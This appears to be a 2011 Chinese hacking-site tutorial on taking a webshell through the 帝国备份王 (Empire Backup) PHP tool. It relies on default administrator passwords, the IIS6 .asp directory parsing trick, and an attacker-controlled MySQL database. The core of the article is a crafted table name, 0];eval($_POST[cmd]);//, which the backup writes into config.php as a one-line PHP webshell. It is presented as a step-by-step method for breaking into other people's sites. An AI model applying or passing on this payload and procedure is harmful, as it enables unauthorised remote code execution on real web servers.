热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

帝国备份王拿WEBSEHLL方法详解

发布时间:2011-06-03 12:25文章来源:网络文章作者:兔子 点击次数:
摘要:上次看RING3H通过这个程序拿了WEBSHELL,不过他那个很简单,有个功能是 能直接替换了,就很简单。不多说。我这里重点说下没这个功能的版本怎么拿SHELL。貌似有不少的管理员爱用这玩意儿,又不改默认的密码 废话不多说。如果进去后MYSQL已经配置好了,那么好...

 上次看RING3H通过这个程序拿了WEBSHELL,不过他那个很简单,有个功能是

    1.jpg

    能直接替换了,就很简单。不多说。我这里重点说下没这个功能的版本怎么拿SHELL。貌似有不少的管理员爱用这玩意儿,又不改默认的密码


   废话不多说。如果进去后MYSQL已经配置好了,那么好办,直接上,如果没有配置而你又没目标的数据库信息,那么一样可以拿,用自己的库日别人的站,就这么简单。


      分别说下解析器。如果你遇到IIS6的(可能会很少),直接新建个.asp的目录,如图


       2.jpg

     木马就在   1.asp/readme.txt

    现在重点说下APACHE,毕竟是PHP的系统,这个最多了

     第一步,选择好你的MYSQL,记得有点必须的,第一是能外连,第二是大小写敏感的!不然没用,第三,还能允许表名字里面出现//符号的,我找了半天才找到,为什么要有这个符号,PHP语法规定的

     第二步,建立一个空库,里面弄建立一个空的表,表名0];eval($_POST[cmd]);//  至于为什么取这个名字,不解释,你懂的

     第三步,备份数据,目录名字无所谓,不管这个备份王提示什么,你都不用管,如果他说失败,实际上也是成功了的

一句话地址:备份目录名字/config.php

  利用的原理:这个 系统备份的时候,会把表名写到备份文件里面去,config.php的内容大致如下:

    3.jpg


   当时就琢磨着去闭合那个引号,不知道咋的,引号就是写不进去,后来就洗洗睡了,第二天仔细研究了下,下面中括号里面还有表名(思路啊!眼睛放宽点),蛋疼,于是乎就放弃了去闭合上面的引号,写出了闭合下面的中括号的语句来构造

     文章无技术含量,看官勿笑。希望能帮到有用的人

标签分类:

上一篇:某网站后台取得webshell方法及思路
下一篇:简单突破数据库备份路径限制拿shell